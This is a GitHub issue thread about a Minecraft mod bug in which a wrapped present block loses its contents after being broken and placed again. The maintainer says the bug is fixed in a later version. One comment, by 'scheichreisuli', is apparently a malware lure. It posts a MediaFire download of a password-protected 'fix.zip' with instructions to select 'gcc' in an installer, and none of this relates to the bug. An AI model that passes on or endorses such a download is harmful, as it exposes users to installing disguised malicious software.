### ISSUE TITLE
[BUG] Present deleting items

### ISSUE THREAD

**Issue by Kimlopezplay** [DaFuqs/Spectrum#474]
**Describe the bug**
On my server with friends someone want to give a present to someone, but when placed and broken, to move in another place, present lost it data and items inside.
**To Reproduce**
1. Put in present box some items. 
2. Wrap the present
3. Place and broke
4. Place again and open

**Expected behavior**
A concise description of what you expected to happen.
Present opens and give items, that was inside
**Minecraft version**
Minecraft version 1.19.2 fabric
**Mod version**
Mod version 1.7.6
**Screenshots**
Some cobblestone inside the present
![2024-08-28_17 18 01](https://github.com/user-attachments/assets/c17a9d9b-8bcc-4820-8d8d-ea68e914fd3b)
Wrap it
![2024-08-28_17 18 16](https://github.com/user-attachments/assets/07080202-6f8f-40fa-8f98-0c672911b4cf)
Place in a world
![2024-08-28_17 18 25](https://github.com/user-attachments/assets/13bb241c-7274-4285-a145-6e59db6d6b2f)
Break it to move in another place (or replace back in position)
![2024-08-28_17 18 31](https://github.com/user-attachments/assets/5c92a828-d36e-48f6-ac8c-860d44dce60d)
Looks like the previous one
![2024-08-28_17 18 42](https://github.com/user-attachments/assets/ffdd128c-4c45-45d8-a511-44e81ca9b68d)
Open the sweet present
![2024-08-28_17 18 50](https://github.com/user-attachments/assets/c48f3f28-59f8-4daf-9ab9-8cbedc10a12e)
All the cobblestone gone
![2024-08-28_17 18 55](https://github.com/user-attachments/assets/79a42bb8-107b-435e-a255-8c9ad47d48fe)

If there still some questions, i'll be happy to answer! (this is my first bug report btw, and i'm bad english)

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DaFuqs** [comment]
That is fixed in 1.20.1, but if I make a backport of some things I will include that fix
